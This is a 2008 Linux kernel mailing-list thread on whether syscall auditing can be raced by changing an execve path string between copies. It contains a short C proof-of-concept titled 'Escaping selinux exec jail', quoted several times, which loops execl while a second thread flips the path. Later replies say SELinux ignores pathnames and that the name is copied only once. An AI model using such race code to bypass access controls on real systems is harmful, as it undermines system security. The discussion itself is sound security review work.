System call audit

All of lore.kernel.org
 help / color / mirror / Atom feed

* System call audit
@ 2008-05-13  0:06 Mathieu Desnoyers
  2008-05-13  9:24 ` David Woodhouse
  0 siblings, 1 reply; 8+ messages in thread
From: Mathieu Desnoyers @ 2008-05-13  0:06 UTC (permalink / raw)
  To: David Woodhouse, linux-kernel; +Cc: mingo

Hi David,

As I am looking into the system-wide system call tracing problem, I
start to wonder how auditsc deals with the fact that user-space could
concurrently change the content referred to by the __user pointers.

This would be the case for execve. If we create a program with two
thread; one is executing execve syscalls and the other thread would be
modifying the userspace string containing the name of the program to
execute. Since we have two copy_from_user, one in auditsc and one in the
real execve() function, the string passed to the OS could differ from
the string seen by auditsc.

Regards,

Mathieu

-- 
Mathieu Desnoyers
OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F  BA06 3F25 A8FE 3BAE 9A68

^ permalink raw reply	[flat|nested] 8+ messages in thread

* Re: System call audit
  2008-05-13  0:06 System call audit Mathieu Desnoyers
@ 2008-05-13  9:24 ` David Woodhouse
  2008-05-13 12:51   ` Mathieu Desnoyers
  0 siblings, 1 reply; 8+ messages in thread
From: David Woodhouse @ 2008-05-13  9:24 UTC (permalink / raw)
  To: Mathieu Desnoyers; +Cc: linux-kernel, mingo

On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
> Hi David,
> 
> As I am looking into the system-wide system call tracing problem, I
> start to wonder how auditsc deals with the fact that user-space could
> concurrently change the content referred to by the __user pointers.

In general we have to copy the content into kernel space, audit it, and
then act on it from there. See the explanation on the IPC audit patch at
http://lwn.net/Articles/125350/ for example.

Auditing one thing and then acting on another would be simply broken.

> This would be the case for execve. If we create a program with two
> thread; one is executing execve syscalls and the other thread would be
> modifying the userspace string containing the name of the program to
> execute.

I was going to suggest that that attack vector won't work, because
execve() kills all threads. But all you have to do to avoid that is put
the data in question into a shared writable mmap and modify it from
another _process_. And in fact I suspect there's a combination of CLONE_
flags which would avoid the thread-killing behaviour anyway.

>  Since we have two copy_from_user, one in auditsc and one in the
> real execve() function, the string passed to the OS could differ from
> the string seen by auditsc.

Right. Don't Do That Then. The audit code should see what's _actually_
given to the child process. The audit/execve code has changed since I
last looked, but I think it's probably OK because it's reading the
contents of the new program's mm on the way back from the execve()
system call -- before ever giving the CPU back to that process.

-- 
dwmw2

^ permalink raw reply	[flat|nested] 8+ messages in thread

* Re: System call audit
  2008-05-13  9:24 ` David Woodhouse
@ 2008-05-13 12:51   ` Mathieu Desnoyers
  2008-05-13 12:59     ` David Woodhouse
  2008-05-13 13:12     ` Stephen Smalley
  0 siblings, 2 replies; 8+ messages in thread
From: Mathieu Desnoyers @ 2008-05-13 12:51 UTC (permalink / raw)
  To: David Woodhouse; +Cc: linux-kernel, mingo

* David Woodhouse (dwmw2@infradead.org) wrote:
> On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
> > Hi David,
> > 
> > As I am looking into the system-wide system call tracing problem, I
> > start to wonder how auditsc deals with the fact that user-space could
> > concurrently change the content referred to by the __user pointers.
> 
> In general we have to copy the content into kernel space, audit it, and
> then act on it from there. See the explanation on the IPC audit patch at
> http://lwn.net/Articles/125350/ for example.
> 
> Auditing one thing and then acting on another would be simply broken.
> 
> > This would be the case for execve. If we create a program with two
> > thread; one is executing execve syscalls and the other thread would be
> > modifying the userspace string containing the name of the program to
> > execute.
> 
> I was going to suggest that that attack vector won't work, because
> execve() kills all threads. But all you have to do to avoid that is put
> the data in question into a shared writable mmap and modify it from
> another _process_. And in fact I suspect there's a combination of CLONE_
> flags which would avoid the thread-killing behaviour anyway.
> 

Even better : if execve fails, it doesn't kill the threads. Therefore,
all we have to do is to busy-loop doing failing execve() calls and
atomically change the string to what we want to be executed. Can anyone
test the sample snippet in a context where executing /bin/bash is
disallowed on a SMP system ? I don't have a selinux setup handy. I
suppose that as soon as selinux would see one /bin/bash exec, it will
kill the process, so a few runs would be required in order to generate
the correct race.


/*
 * Escaping selinux exec jail
 *
 * build with gcc -lpthread -o escape-selinux escape-selinux.c
 *
 * Mathieu Desnoyers
 * License: GPL
 */

#include <stdio.h>
#include <pthread.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <stdio.h>
#include <signal.h>

static char modstring[] = "$bin/bash";

void *thr1(void *arg)
{
	while(1) {
		execl(modstring, NULL);
	}
	return ((void*)1);

}

void *thr2(void *arg)
{
	while(1) { 
		modstring[0] = '$';
		modstring[0] = '/';
	}
	return ((void*)2);
}

int main()
{
	int err;
	pthread_t tid1, tid2;
	void *tret;

	err = pthread_create(&tid1, NULL, thr1, NULL);
	if (err != 0)
		exit(1);

	err = pthread_create(&tid2, NULL, thr2, NULL);
	if (err != 0)
		exit(1);

	sleep(10);

	err = pthread_join(tid1, &tret);
	if (err != 0)
		exit(1);

	err = pthread_join(tid2, &tret);
	if (err != 0)
		exit(1);

	return 0;
}


> >  Since we have two copy_from_user, one in auditsc and one in the
> > real execve() function, the string passed to the OS could differ from
> > the string seen by auditsc.
> 
> Right. Don't Do That Then. The audit code should see what's _actually_
> given to the child process. The audit/execve code has changed since I
> last looked, but I think it's probably OK because it's reading the
> contents of the new program's mm on the way back from the execve()
> system call -- before ever giving the CPU back to that process.
> 
> -- 
> dwmw2
> 

-- 
Mathieu Desnoyers
OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F  BA06 3F25 A8FE 3BAE 9A68

^ permalink raw reply	[flat|nested] 8+ messages in thread

* Re: System call audit
  2008-05-13 12:51   ` Mathieu Desnoyers
@ 2008-05-13 12:59     ` David Woodhouse
  2008-05-13 13:12       ` Mathieu Desnoyers
  2008-05-13 13:51       ` Mathieu Desnoyers
  2008-05-13 13:12     ` Stephen Smalley
  1 sibling, 2 replies; 8+ messages in thread
From: David Woodhouse @ 2008-05-13 12:59 UTC (permalink / raw)
  To: Mathieu Desnoyers; +Cc: linux-kernel, mingo

On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
> * David Woodhouse (dwmw2@infradead.org) wrote:
> > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
> > > Hi David,
> > > 
> > > As I am looking into the system-wide system call tracing problem, I
> > > start to wonder how auditsc deals with the fact that user-space could
> > > concurrently change the content referred to by the __user pointers.
> > 
> > In general we have to copy the content into kernel space, audit it, and
> > then act on it from there. See the explanation on the IPC audit patch at
> > http://lwn.net/Articles/125350/ for example.
> > 
> > Auditing one thing and then acting on another would be simply broken.
> > 
> > > This would be the case for execve. If we create a program with two
> > > thread; one is executing execve syscalls and the other thread would be
> > > modifying the userspace string containing the name of the program to
> > > execute.
> > 
> > I was going to suggest that that attack vector won't work, because
> > execve() kills all threads. But all you have to do to avoid that is put
> > the data in question into a shared writable mmap and modify it from
> > another _process_. And in fact I suspect there's a combination of CLONE_
> > flags which would avoid the thread-killing behaviour anyway.
> > 
> 
> Even better : if execve fails, it doesn't kill the threads. Therefore,
> all we have to do is to busy-loop doing failing execve() calls and
> atomically change the string to what we want to be executed. Can anyone
> test the sample snippet in a context where executing /bin/bash is
> disallowed on a SMP system ? I don't have a selinux setup handy. 

You were talking about audit earlier. Now you seem to be talking about
selinux. 

-- 
dwmw2


^ permalink raw reply	[flat|nested] 8+ messages in thread

* Re: System call audit
  2008-05-13 12:59     ` David Woodhouse
@ 2008-05-13 13:12       ` Mathieu Desnoyers
  2008-05-13 13:19         ` Stephen Smalley
  2008-05-13 13:51       ` Mathieu Desnoyers
  1 sibling, 1 reply; 8+ messages in thread
From: Mathieu Desnoyers @ 2008-05-13 13:12 UTC (permalink / raw)
  To: David Woodhouse; +Cc: linux-kernel, mingo

* David Woodhouse (dwmw2@infradead.org) wrote:
> On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
> > * David Woodhouse (dwmw2@infradead.org) wrote:
> > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
> > > > Hi David,
> > > > 
> > > > As I am looking into the system-wide system call tracing problem, I
> > > > start to wonder how auditsc deals with the fact that user-space could
> > > > concurrently change the content referred to by the __user pointers.
> > > 
> > > In general we have to copy the content into kernel space, audit it, and
> > > then act on it from there. See the explanation on the IPC audit patch at
> > > http://lwn.net/Articles/125350/ for example.
> > > 
> > > Auditing one thing and then acting on another would be simply broken.
> > > 
> > > > This would be the case for execve. If we create a program with two
> > > > thread; one is executing execve syscalls and the other thread would be
> > > > modifying the userspace string containing the name of the program to
> > > > execute.
> > > 
> > > I was going to suggest that that attack vector won't work, because
> > > execve() kills all threads. But all you have to do to avoid that is put
> > > the data in question into a shared writable mmap and modify it from
> > > another _process_. And in fact I suspect there's a combination of CLONE_
> > > flags which would avoid the thread-killing behaviour anyway.
> > > 
> > 
> > Even better : if execve fails, it doesn't kill the threads. Therefore,
> > all we have to do is to busy-loop doing failing execve() calls and
> > atomically change the string to what we want to be executed. Can anyone
> > test the sample snippet in a context where executing /bin/bash is
> > disallowed on a SMP system ? I don't have a selinux setup handy. 
> 
> You were talking about audit earlier. Now you seem to be talking about
> selinux. 
> 

I thought selinux did hook into syscall audit ? (sorry, I am new to the
kernel auditing field) The race I refer to is in the auditsc.c kernel
code, so syscall audit would be the one I am talking about. I refer to
selinux here just because, as of my understanding, it happens to be one
module-based callback which can hook on syscall audit.

Mathieu

-- 
Mathieu Desnoyers
OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F  BA06 3F25 A8FE 3BAE 9A68

^ permalink raw reply	[flat|nested] 8+ messages in thread

* Re: System call audit
  2008-05-13 12:51   ` Mathieu Desnoyers
  2008-05-13 12:59     ` David Woodhouse
@ 2008-05-13 13:12     ` Stephen Smalley
  1 sibling, 0 replies; 8+ messages in thread
From: Stephen Smalley @ 2008-05-13 13:12 UTC (permalink / raw)
  To: Mathieu Desnoyers; +Cc: David Woodhouse, linux-kernel, mingo


On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
> * David Woodhouse (dwmw2@infradead.org) wrote:
> > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
> > > Hi David,
> > > 
> > > As I am looking into the system-wide system call tracing problem, I
> > > start to wonder how auditsc deals with the fact that user-space could
> > > concurrently change the content referred to by the __user pointers.
> > 
> > In general we have to copy the content into kernel space, audit it, and
> > then act on it from there. See the explanation on the IPC audit patch at
> > http://lwn.net/Articles/125350/ for example.
> > 
> > Auditing one thing and then acting on another would be simply broken.
> > 
> > > This would be the case for execve. If we create a program with two
> > > thread; one is executing execve syscalls and the other thread would be
> > > modifying the userspace string containing the name of the program to
> > > execute.
> > 
> > I was going to suggest that that attack vector won't work, because
> > execve() kills all threads. But all you have to do to avoid that is put
> > the data in question into a shared writable mmap and modify it from
> > another _process_. And in fact I suspect there's a combination of CLONE_
> > flags which would avoid the thread-killing behaviour anyway.
> > 
> 
> Even better : if execve fails, it doesn't kill the threads. Therefore,
> all we have to do is to busy-loop doing failing execve() calls and
> atomically change the string to what we want to be executed. Can anyone
> test the sample snippet in a context where executing /bin/bash is
> disallowed on a SMP system ? I don't have a selinux setup handy. I
> suppose that as soon as selinux would see one /bin/bash exec, it will
> kill the process, so a few runs would be required in order to generate
> the correct race.

SELinux doesn't base any of its decisions on pathname strings provided
by the user (or pathnames at all, for that matter; SELinux is
attribute/label-based).

> 
> /*
>  * Escaping selinux exec jail
>  *
>  * build with gcc -lpthread -o escape-selinux escape-selinux.c
>  *
>  * Mathieu Desnoyers
>  * License: GPL
>  */
> 
> #include <stdio.h>
> #include <pthread.h>
> #include <stdlib.h>
> #include <sys/types.h>
> #include <sys/wait.h>
> #include <unistd.h>
> #include <stdio.h>
> #include <signal.h>
> 
> static char modstring[] = "$bin/bash";
> 
> void *thr1(void *arg)
> {
> 	while(1) {
> 		execl(modstring, NULL);
> 	}
> 	return ((void*)1);
> 
> }
> 
> void *thr2(void *arg)
> {
> 	while(1) { 
> 		modstring[0] = '$';
> 		modstring[0] = '/';
> 	}
> 	return ((void*)2);
> }
> 
> int main()
> {
> 	int err;
> 	pthread_t tid1, tid2;
> 	void *tret;
> 
> 	err = pthread_create(&tid1, NULL, thr1, NULL);
> 	if (err != 0)
> 		exit(1);
> 
> 	err = pthread_create(&tid2, NULL, thr2, NULL);
> 	if (err != 0)
> 		exit(1);
> 
> 	sleep(10);
> 
> 	err = pthread_join(tid1, &tret);
> 	if (err != 0)
> 		exit(1);
> 
> 	err = pthread_join(tid2, &tret);
> 	if (err != 0)
> 		exit(1);
> 
> 	return 0;
> }
> 
> 
> > >  Since we have two copy_from_user, one in auditsc and one in the
> > > real execve() function, the string passed to the OS could differ from
> > > the string seen by auditsc.
> > 
> > Right. Don't Do That Then. The audit code should see what's _actually_
> > given to the child process. The audit/execve code has changed since I
> > last looked, but I think it's probably OK because it's reading the
> > contents of the new program's mm on the way back from the execve()
> > system call -- before ever giving the CPU back to that process.
> > 
> > -- 
> > dwmw2
> > 
> 
-- 
Stephen Smalley
National Security Agency


^ permalink raw reply	[flat|nested] 8+ messages in thread

* Re: System call audit
  2008-05-13 13:12       ` Mathieu Desnoyers
@ 2008-05-13 13:19         ` Stephen Smalley
  0 siblings, 0 replies; 8+ messages in thread
From: Stephen Smalley @ 2008-05-13 13:19 UTC (permalink / raw)
  To: Mathieu Desnoyers; +Cc: David Woodhouse, linux-kernel, mingo


On Tue, 2008-05-13 at 09:12 -0400, Mathieu Desnoyers wrote:
> * David Woodhouse (dwmw2@infradead.org) wrote:
> > On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
> > > * David Woodhouse (dwmw2@infradead.org) wrote:
> > > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
> > > > > Hi David,
> > > > > 
> > > > > As I am looking into the system-wide system call tracing problem, I
> > > > > start to wonder how auditsc deals with the fact that user-space could
> > > > > concurrently change the content referred to by the __user pointers.
> > > > 
> > > > In general we have to copy the content into kernel space, audit it, and
> > > > then act on it from there. See the explanation on the IPC audit patch at
> > > > http://lwn.net/Articles/125350/ for example.
> > > > 
> > > > Auditing one thing and then acting on another would be simply broken.
> > > > 
> > > > > This would be the case for execve. If we create a program with two
> > > > > thread; one is executing execve syscalls and the other thread would be
> > > > > modifying the userspace string containing the name of the program to
> > > > > execute.
> > > > 
> > > > I was going to suggest that that attack vector won't work, because
> > > > execve() kills all threads. But all you have to do to avoid that is put
> > > > the data in question into a shared writable mmap and modify it from
> > > > another _process_. And in fact I suspect there's a combination of CLONE_
> > > > flags which would avoid the thread-killing behaviour anyway.
> > > > 
> > > 
> > > Even better : if execve fails, it doesn't kill the threads. Therefore,
> > > all we have to do is to busy-loop doing failing execve() calls and
> > > atomically change the string to what we want to be executed. Can anyone
> > > test the sample snippet in a context where executing /bin/bash is
> > > disallowed on a SMP system ? I don't have a selinux setup handy. 
> > 
> > You were talking about audit earlier. Now you seem to be talking about
> > selinux. 
> > 
> 
> I thought selinux did hook into syscall audit ? (sorry, I am new to the
> kernel auditing field) The race I refer to is in the auditsc.c kernel
> code, so syscall audit would be the one I am talking about. I refer to
> selinux here just because, as of my understanding, it happens to be one
> module-based callback which can hook on syscall audit.

SELinux is a user of the audit subsystem in terms of generating audit
messages for permission denials.  It doesn't rely on any inputs from the
audit subsystem.

-- 
Stephen Smalley
National Security Agency


^ permalink raw reply	[flat|nested] 8+ messages in thread

* Re: System call audit
  2008-05-13 12:59     ` David Woodhouse
  2008-05-13 13:12       ` Mathieu Desnoyers
@ 2008-05-13 13:51       ` Mathieu Desnoyers
  1 sibling, 0 replies; 8+ messages in thread
From: Mathieu Desnoyers @ 2008-05-13 13:51 UTC (permalink / raw)
  To: David Woodhouse; +Cc: linux-kernel, mingo

* David Woodhouse (dwmw2@infradead.org) wrote:
> On Tue, 2008-05-13 at 08:51 -0400, Mathieu Desnoyers wrote:
> > * David Woodhouse (dwmw2@infradead.org) wrote:
> > > On Mon, 2008-05-12 at 20:06 -0400, Mathieu Desnoyers wrote:
> > > > Hi David,
> > > > 
> > > > As I am looking into the system-wide system call tracing problem, I
> > > > start to wonder how auditsc deals with the fact that user-space could
> > > > concurrently change the content referred to by the __user pointers.
> > > 
> > > In general we have to copy the content into kernel space, audit it, and
> > > then act on it from there. See the explanation on the IPC audit patch at
> > > http://lwn.net/Articles/125350/ for example.
> > > 
> > > Auditing one thing and then acting on another would be simply broken.
> > > 
> > > > This would be the case for execve. If we create a program with two
> > > > thread; one is executing execve syscalls and the other thread would be
> > > > modifying the userspace string containing the name of the program to
> > > > execute.
> > > 
> > > I was going to suggest that that attack vector won't work, because
> > > execve() kills all threads. But all you have to do to avoid that is put
> > > the data in question into a shared writable mmap and modify it from
> > > another _process_. And in fact I suspect there's a combination of CLONE_
> > > flags which would avoid the thread-killing behaviour anyway.
> > > 
> > 
> > Even better : if execve fails, it doesn't kill the threads. Therefore,
> > all we have to do is to busy-loop doing failing execve() calls and
> > atomically change the string to what we want to be executed. Can anyone
> > test the sample snippet in a context where executing /bin/bash is
> > disallowed on a SMP system ? I don't have a selinux setup handy. 
> 
> You were talking about audit earlier. Now you seem to be talking about
> selinux. 
> 

Actually, getname/putname seems to make sure the name is only copied
once per audit context. So it should be ok.

Mathieu

-- 
Mathieu Desnoyers
OpenPGP key fingerprint: 8CD5 52C3 8E3C 4140 715F  BA06 3F25 A8FE 3BAE 9A68

^ permalink raw reply	[flat|nested] 8+ messages in thread

end of thread, other threads:[~2008-05-13 13:51 UTC | newest]

Thread overview: 8+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2008-05-13  0:06 System call audit Mathieu Desnoyers
2008-05-13  9:24 ` David Woodhouse
2008-05-13 12:51   ` Mathieu Desnoyers
2008-05-13 12:59     ` David Woodhouse
2008-05-13 13:12       ` Mathieu Desnoyers
2008-05-13 13:19         ` Stephen Smalley
2008-05-13 13:51       ` Mathieu Desnoyers
2008-05-13 13:12     ` Stephen Smalley

This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.